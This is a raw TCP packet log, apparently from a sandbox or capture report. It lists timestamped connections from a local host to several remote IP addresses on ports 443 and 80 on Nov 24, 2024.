                                                                                                                                                                        Nov 24, 2024 05:11:37.152411938 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.152417898 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.207376957 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.208007097 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.208053112 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.210141897 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.210150003 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.300414085 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.301155090 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.301173925 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.301776886 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.301784039 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.521836042 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.521914005 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.522053957 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.537412882 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.537412882 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.537451029 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.537463903 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.541917086 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.541958094 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.542120934 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.542515039 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.542529106 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.562199116 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.562259912 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.562333107 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.567944050 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.567953110 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.567990065 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.567994118 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.573894024 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.573957920 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.574098110 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.574323893 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.574345112 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.597680092 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.597750902 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.597837925 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.598236084 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.598249912 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.598261118 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.598272085 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.603842020 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.603904963 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.603998899 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.604259014 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.604275942 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.660103083 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.660212040 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.660291910 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.660595894 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.660620928 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.660634041 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.660639048 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.665245056 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.665302038 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.665412903 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.665618896 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.665633917 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.753004074 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.753191948 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.753348112 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.759838104 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.759838104 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.759872913 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.759890079 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.764405966 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.764466047 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.764610052 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.764823914 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.764844894 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.799592972 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.799680948 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.800030947 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:37.800076962 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:37.912981033 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:37.913022995 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.913280010 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:37.913837910 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:37.913856983 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.218234062 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.218312025 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.219780922 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.219806910 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.220041037 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.229398966 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.229398966 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.229487896 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.263930082 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.264604092 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.264635086 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.266292095 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.266300917 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.358032942 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.358910084 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.358932018 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.359632015 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.359638929 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.383713007 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.385867119 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.385894060 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.386430979 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.386435986 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.451040030 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.458698988 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.458720922 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.459285021 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.459292889 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.618876934 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.619715929 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.619795084 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.621500015 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.621512890 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.783226013 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.783299923 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.783462048 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.783718109 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.783736944 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.783749104 CET49751443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.783756018 CET4434975113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.787409067 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.787453890 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.788995028 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.789176941 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.789196014 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.801377058 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.801430941 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.801522017 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.801744938 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.801769972 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.801789999 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.801796913 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.805006027 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.805067062 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.805139065 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.805320978 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.805341005 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.827553988 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.827635050 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.827805042 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.835099936 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.835133076 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.835148096 CET49753443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.835155964 CET4434975313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.838736057 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.838782072 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.842856884 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.843008041 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.843028069 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.894032955 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.894110918 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.894839048 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.894881010 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.894906044 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.894918919 CET49754443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.894925117 CET4434975413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.903651953 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.903712988 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.903820038 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.904314995 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:39.904339075 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.949898958 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.949989080 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.950083971 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.950340986 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.950372934 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.950387001 CET49756443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:39.950392962 CET44349756104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:39.952338934 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:40.071830988 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.072226048 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:40.072647095 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:40.074666977 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.074839115 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.074944973 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:40.075191021 CET49755443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:40.075211048 CET4434975513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.079150915 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:40.079195023 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.079268932 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:40.079454899 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:40.079473019 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:40.192101002 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413022041 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413053989 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413064957 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413075924 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413085938 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413090944 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413098097 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413113117 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.413191080 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.413196087 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413207054 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413216114 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.413266897 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.532793999 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.532814026 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.532969952 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.583901882 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.585011959 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.585079908 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.587269068 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.587277889 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.604882002 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.605042934 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.605110884 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.609064102 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.609163046 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.609216928 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.617451906 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.617594957 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.617701054 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.625849009 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.625947952 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.626003027 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.632752895 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.633441925 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.633464098 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.634215117 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.634310007 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.634365082 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.634418011 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.634422064 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.642687082 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.642822981 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.642877102 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.651026964 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.651128054 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.651184082 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.659444094 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.659519911 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.659574986 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.667819023 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.667884111 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.667952061 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.676139116 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.676230907 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.676285028 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.684501886 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.684542894 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.684602976 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.688385963 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.688915968 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.689220905 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.689234018 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.689480066 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.689507961 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.689996958 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.690006018 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.690023899 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:41.690037012 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.797431946 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.797449112 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.797518015 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.800740004 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.800753117 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.800810099 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.805340052 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.805351019 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.805423021 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.809778929 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.810926914 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.813026905 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.816004992 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.816021919 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.816103935 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.820478916 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.820498943 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.820558071 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.825488091 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.825500011 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.825561047 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.829792023 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.829804897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.829854012 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.834419012 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.834429979 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.834501028 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.839294910 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.839308977 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.839363098 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.844026089 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.844039917 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.844122887 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.848548889 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.849751949 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.849803925 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.854381084 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.854410887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.854454994 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.858879089 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.858889103 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:41.858938932 CET4976180192.168.2.7185.215.113.16
